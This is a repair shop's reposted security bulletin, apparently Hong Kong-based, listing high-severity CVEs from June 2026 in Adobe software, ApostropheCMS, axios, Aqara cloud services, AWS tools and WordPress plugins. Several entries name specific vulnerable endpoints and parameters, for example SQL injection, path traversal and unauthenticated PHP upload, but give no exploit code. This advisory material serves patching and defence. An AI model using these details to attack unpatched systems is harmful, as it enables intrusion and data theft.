電腦維修中心
電腦維修中心每天都會更新以下電腦病毒及入侵警告, 希望大家可以及早留意; 以免因病毒感染而引致資料遺失或硬件損壞!
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| AdguardTeam--AdGuardHome | AdGuard Home, when started with the --glinet flag, contains an authentication bypass vulnerability that allows unauthenticated attackers to gain full admin access by supplying a path traversal sequence in the Admin-Token cookie, exploiting unsanitized string concatenation in the token file path construction within the authglinet middleware. Attackers can craft a request with a traversal payload in the Admin-Token header to redirect file reads to arbitrary paths. | 2026-06-08 | 9.4 | CVE-2026-41448 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47911 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47912 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47913 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47914 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47915 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47916 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47917 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47918 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47919 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47920 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47921 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an Uncontrolled Search Path Element vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 7.4 | CVE-2026-47937 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47952 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47955 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47959 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-12 | 7.8 | CVE-2026-47965 |
| Adobe--Adobe Campaign Classic (ACC) | Adobe Campaign Classic (ACC) versions 7.4.3 build 9394 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in privilege escalation. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 10 | CVE-2026-47938 |
| Adobe--Adobe Campaign Classic (ACC) | Adobe Campaign Classic (ACC) versions 7.4.3 build 9394 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 10 | CVE-2026-48303 |
| Adobe--Adobe Experience Manager Forms JEE | Adobe Experience Manager Forms JEE versions LTS SP1, 6.5.24.0 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed. | 2026-06-09 | 9.3 | CVE-2026-34691 |
| Adobe--Adobe Experience Manager Forms JEE | Adobe Experience Manager Forms JEE versions LTS SP1, 6.5.24.0 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed. | 2026-06-09 | 8 | CVE-2026-34693 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 7.5 | CVE-2026-34711 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Improper Input Validation vulnerability. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 7.5 | CVE-2026-34712 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 7.5 | CVE-2026-34713 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 9.6 | CVE-2026-47928 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. A high-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 8.4 | CVE-2026-47929 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized read and write access. Exploitation of this issue does not require user interaction. | 2026-06-09 | 8.1 | CVE-2026-47930 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed. | 2026-06-09 | 8.4 | CVE-2026-47931 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 8.8 | CVE-2026-47932 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 7.4 | CVE-2026-47960 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by a Dependency on Vulnerable Third-Party Component vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 8.6 | CVE-2026-47906 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 8.2 | CVE-2026-47907 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-47908 |
| Adobe--Format Plugins | Format Plugins versions 1.1.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48291 |
| Adobe--Format Plugins | Format Plugins versions 1.1.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48292 |
| Adobe--InCopy | InCopy versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34706 |
| Adobe--InCopy | InCopy versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34707 |
| Adobe--InCopy | InCopy versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34708 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34695 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34696 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34697 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34698 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34699 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34700 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34701 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34702 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48293 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34709 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-34710 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48305 |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 6.0.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 7.8 | CVE-2026-48306 |
| Amasty--Order Attributes for Magento 2 | Amasty Order Attributes for Magento 2 before version 4.0.0 contains an unauthenticated arbitrary file upload vulnerability that allows unauthenticated attackers to write arbitrary files to the store's media directory by submitting files of any type or name to the upload endpoint without authentication, session validation, or cart context. Attackers can upload PHP files to achieve remote code execution on servers where the media directory permits PHP execution, or alternatively enable malware hosting, stored cross-site scripting via HTML or SVG uploads, and path traversal to write files outside the intended upload directory. | 2026-06-12 | 9.8 | CVE-2026-53787 |
| AmentoTech--Doctreat Core | The Doctreat Core plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.6.8. This is due to the doctreat_process_registration() function not properly restricting the roles that a user can register with. This makes it possible for unauthenticated attackers to register as an administrator user. | 2026-06-10 | 9.8 | CVE-2025-6254 |
| apostrophecms--@apostrophecms/seo | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 1.4.2 of the `@apostrophecms/seo` package injects the Google Analytics Tracking ID (`seoGoogleTrackingId`) and Google Tag Manager ID (`seoGoogleTagManager`) directly into `<script>` tag bodies using JavaScript template literals without any sanitization or validation. Any user with editor-level access (the default role for content managers) can set these fields to a malicious value, resulting in stored XSS that executes on every page for every visitor of the site. As of time of publication, no known patched versions are available. | 2026-06-12 | 8.7 | CVE-2026-53608 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. In versions up to and including 4.30.0, `apos.util.set()` traverses dot-notation paths without sanitizing `__proto__`, allowing an authenticated editor to write arbitrary values to `Object.prototype` via the `$pullAll` patch operator. A confirmed gadget in `publicApiCheck()` causes this to bypass authorization on all piece-type REST API endpoints for every subsequent unauthenticated request, for the lifetime of the Node.js process. As of time of publication, no known patched versions are available. | 2026-06-12 | 9.1 | CVE-2026-53609 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 4.29.0 have a password reset flow that constructs the reset URL using `req.hostname`, which is derived directly from the attacker-controlled HTTP `Host` header when `apos.baseUrl` is not explicitly configured. An unauthenticated attacker who knows a victim's email address can send a crafted reset request that causes the application to email the victim a reset link pointing to the attacker's domain. When the victim clicks the link, the valid reset token is delivered to the attacker, enabling full account takeover. As of time of publication, no known patched versions are available. | 2026-06-12 | 8.1 | CVE-2026-45013 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Version 4.29.0 has a stored cross-site scripting vulnerability in the image widget functionality. A user with the Editor role can configure an image widget link to use a javascript: URL payload. Because editors have permission to publish pages, the malicious widget can be published to the live site. When another user, including an administrator or public visitor, clicks the affected image/link, arbitrary JavaScript executes in the victim's browser. As of time of publication, no known patched versions are available. | 2026-06-12 | 7.3 | CVE-2026-45011 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 4.29.0 contain an authenticated server-side request forgery (SSRF) in the rich-text widget import flow. An authenticated user who can submit/edit rich-text widget content can cause the server to fetch attacker-controlled URLs during widget validation. For image-compatible responses, the fetched content can be persisted and re-hosted by Apostrophe, allowing response exfiltration. As of time of publication, no known patched versions are available. | 2026-06-12 | 7.6 | CVE-2026-45012 |
| apostrophecms--sanitize-html | ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: 'discard'` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue. | 2026-06-12 | 9.3 | CVE-2026-44990 |
| Apptha--Apptha Slider Gallery | Apptha Slider Gallery 1.0 contains a path traversal vulnerability that allows unauthenticated attackers to download arbitrary files by manipulating the imgname parameter. Attackers can send requests to asgallDownload.php with directory traversal sequences ../ to access sensitive files outside the intended directory. | 2026-06-09 | 7.5 | CVE-2017-20248 |
| apptha--Apptha Slider Gallery | Apptha Slider Gallery 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the albid parameter. Attackers can send GET requests with crafted SQL payloads in the albid parameter to extract sensitive database information including user credentials and authentication hashes. | 2026-06-09 | 8.2 | CVE-2017-20249 |
| Apptha--Mac Photo Gallery | Mac Photo Gallery 3.0 contains a path traversal vulnerability that allows unauthenticated attackers to download arbitrary files by manipulating the albid parameter. Attackers can send requests to macdownload.php with directory traversal sequences to access sensitive files like wp-load.php outside the intended plugin directory. | 2026-06-09 | 7.5 | CVE-2017-20250 |
| Apptha--PICA Photo Gallery | WordPress Plugin PICA Photo Gallery 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the aid parameter. Attackers can send GET requests with crafted SQL payloads in the aid parameter to extract sensitive database information including user credentials and table contents. | 2026-06-09 | 8.2 | CVE-2017-20247 |
| Aqara--Aqara Developer Portal | The Aqara Developer Portal (developer.aqara.com) and shared test environments (developer-test.aqara.com, aiot-test.aqara.com) exhibit cross-origin request sharing, which is an instance of "CWE-942: Permissive Cross-domain Policy with Untrusted Domains," and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N (8.2 High). | 2026-06-12 | 8.2 | CVE-2026-50088 |
| Aqara--Aqara IAM/SSO Gateway | The Aqara IAM/SSO gateway (gw-builder.aqara.com) exposes bidirectional AES round-trups against the platform's signing key without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and "CWE-327: Use of a Broken or Risky Cryptographic Algorithm," and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High). | 2026-06-12 | 10 | CVE-2026-50086 |
| Aqara--Aqara IAM/SSO Gateway | The Aqara IAM/SSO gateway (gw-builder.aqara.com) exhibits a cross-origin request sharing vulnerability, which is an instance of "CWE-942: Permissive Cross-domain Policy with Untrusted Domains," and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N (8.2 High). | 2026-06-12 | 8.2 | CVE-2026-50087 |
| Aqara--Aquara IAM/SSO Gateway | The Aqara IAM/SSO Gateway (gw-builder.aqara.com) used a hardcoded OAuth client credential, which is an instance of "CWE-798: Use of Hard-coded Credentials." This issue has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 Critical). When combined with CVE-2026-50082, CVE-50084, and CVE-50085, this can lead to a fully unauthenticated, remote takeover of affected devices. | 2026-06-12 | 9.1 | CVE-2026-50083 |
| Aqara--Board service | The Aqara Board service (op-test.aqara.com) accepts arbitrary MQTT command payloads, and forwards them to the platfom's HiveMQ broker without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and has an estimated CVSS ofCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L (8.6 High). When combined with CVE-2026-50082, CVE-50083, and CVE-50084, this can lead to a fully unauthenticated, remote takeover of affected devices. | 2026-06-12 | 8.6 | CVE-2026-50085 |
| Aqara--Cloud OAuth Authorization Endpoint | The Aqara Cloud OAuth Authorization Endpoint (open-cn.aqara.com/oauth/authorize) is vulnerable to a redirect bypass due to lax controls on domain matching, which is an instance of "CWE-1289: Improper Validation of Unsafe Equivalence in Input" and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N (9.3 Critical). | 2026-06-12 | 9.3 | CVE-2026-50090 |
| Aqara--Cloud Production API | The Aqara Cloud Production API (open-cn.aqara.com/v3.0/open/api) would authorize any valid developer token for access to any account. This is an instance of "CWE-862: Missing Authorization" with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N (9.6 Critical). When combined with CVE-2026-50082, CVE-50083, and CVE-50085, this can lead to a fully unauthenticated, remote takeover of affected devices. | 2026-06-12 | 9.6 | CVE-2026-50084 |
| Aqara--com.lumiunited.aqarahome | Aqara Home Android (com.lumiunited.aqarahome) 6.0.0 (and white-label clients embedding the same liblumidevsdk.so) uses hard-coded cryptographic keys, which is an instance of "CWE-321: Use of Hard-coded Cryptographic Key" and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 Critical). | 2026-06-12 | 9.1 | CVE-2026-50091 |
| ArnasDon--wacrm | WACRM prior to commit 73041bf contain an authorization bypass vulnerability in the automation engine that allows authenticated attackers to access and modify contacts belonging to other tenants by supplying an arbitrary caller-controlled contact_id in the POST request body without tenant ownership verification. Attackers can exploit the service-role client that bypasses row-level security to modify victim contact fields including name, email, and company across tenant boundaries using only a known contact UUID. | 2026-06-08 | 7.1 | CVE-2026-49141 |
| AWS--AgentCore CLI | Improper neutralization of triple-quote characters during Python code generation in AgentCore CLI before v0.14.2 might allow an authenticated remote threat actor to execute arbitrary code on AWS AgentCore Runtime under the imported agent's IAM execution role and on the local environment of another user in the same AWS account, via a crafted collaborationInstruction stored on a Bedrock Agent collaborator and later processed by that other user during agent import. To remediate this issue, users should upgrade to version 0.14.2. | 2026-06-08 | 9 | CVE-2026-11393 |
| AWS--AWS Cloud Development Kit library | OS command injection in the NodejsFunction local bundling pipeline in aws-cdk-lib before 2.245.0 (2.246.0 on Windows) might allow an actor who controls the value of one or more bundling properties (externalModules, define, loader, inject, or esbuildArgs) to execute arbitrary commands on the host running the CDK toolchain via injected shell metacharacters. This issue requires the threat actor to control the value of one or more of the affected bundling properties in the CDK application. To remediate this issue, users should upgrade to aws-cdk-lib 2.245.0 (2.246.0 on Windows) or later. | 2026-06-10 | 7.3 | CVE-2026-11417 |
| AWS--aws-c-http | Improper handling of HPACK dynamic table size updates in the AWS Common Runtime aws-c-http library might allow a remote threat actor operating a server to cause memory corruption on a connecting client application, potentially leading to arbitrary code execution, via a crafted sequence of HTTP/2 HEADERS frames. To remediate this issue, users should upgrade to aws-c-http version 0.11.0. | 2026-06-12 | 8.8 | CVE-2026-12043 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios does not normalise IPv4-mapped IPv6 addresses. When NO_PROXY lists an IPv4 address such as 127.0.0.1 or 169.254.169.254, a request URL using the IPv4-mapped IPv6 form (::ffff:7f00:1, ::ffff:a9fe:a9fe) still routes through the configured proxy. Node.js resolves these addresses to the underlying IPv4 host, so the request reaches the internal service via the proxy rather than being blocked. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 8.6 | CVE-2026-44492 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack - intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0. | 2026-06-11 | 8.7 | CVE-2026-44494 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios' Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 7.5 | CVE-2026-44486 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Axios versions 1.7.0 through 1.15.x did not enforce configured request and response size limits when requests were sent with the fetch adapter. Applications that selected adapter: 'fetch', or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than maxContentLength or maxBodyLength despite those limits being explicitly configured. This can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large data: URL, or when an application forwards attacker-controlled request bodies through axios while relying on maxBodyLength as a boundary. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 7.5 | CVE-2026-44488 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From 0.19.0 to before 0.31.1 and 1.15.2, Axios contains prototype-pollution gadgets in request config processing. If another vulnerability in the same JavaScript process has already polluted Object.prototype.transformResponse, affected Axios versions may treat that inherited value as request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request. This vulnerability is fixed in 0.31.1 and 1.15.2. | 2026-06-11 | 7 | CVE-2026-44495 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Axios versions before 0.32.0 on the 0.x line and before 1.16.0 on the 1.x line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads document.cookie. The practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read document.cookie. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 7.5 | CVE-2026-44496 |
| Baarsoft Information Technologies Inc.--Rotaban | Unrestricted upload of file with dangerous type vulnerability in BaÅŸarsoft Information Technologies Inc. Rotaban allows Upload a Web Shell to a Web Server. This issue affects Rotaban: from V2026.06.002 before V2026.06.003. | 2026-06-11 | 9.9 | CVE-2026-11839 |
| Babelen Group Food Cafe Businesses Industry and Trade Ltd. Co.--Pause+ Mobile App | Improper restriction of excessive authentication attempts vulnerability in BaÅŸbelen Group Food Cafe Businesses Industry and Trade Ltd. Co. Pause+ Mobile App allows Authentication Bypass. This issue affects Pause+ Mobile App: from v1.0.6 before v1.5. | 2026-06-12 | 9.8 | CVE-2026-6853 |
| background-image-cropper--Background Image Cropper | WordPress Background Image Cropper version 1.2 contains a remote code execution vulnerability that allows unauthenticated attackers to upload arbitrary files by accessing the ups.php endpoint. Attackers can upload PHP files through the file upload form in the plugin directory to execute arbitrary code on the server. | 2026-06-08 | 9.8 | CVE-2024-58348 |
| Beardev--JoomSport | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection. This issue affects JoomSport: from n/a through 5.7.7. | 2026-06-11 | 9.3 | CVE-2026-42647 |
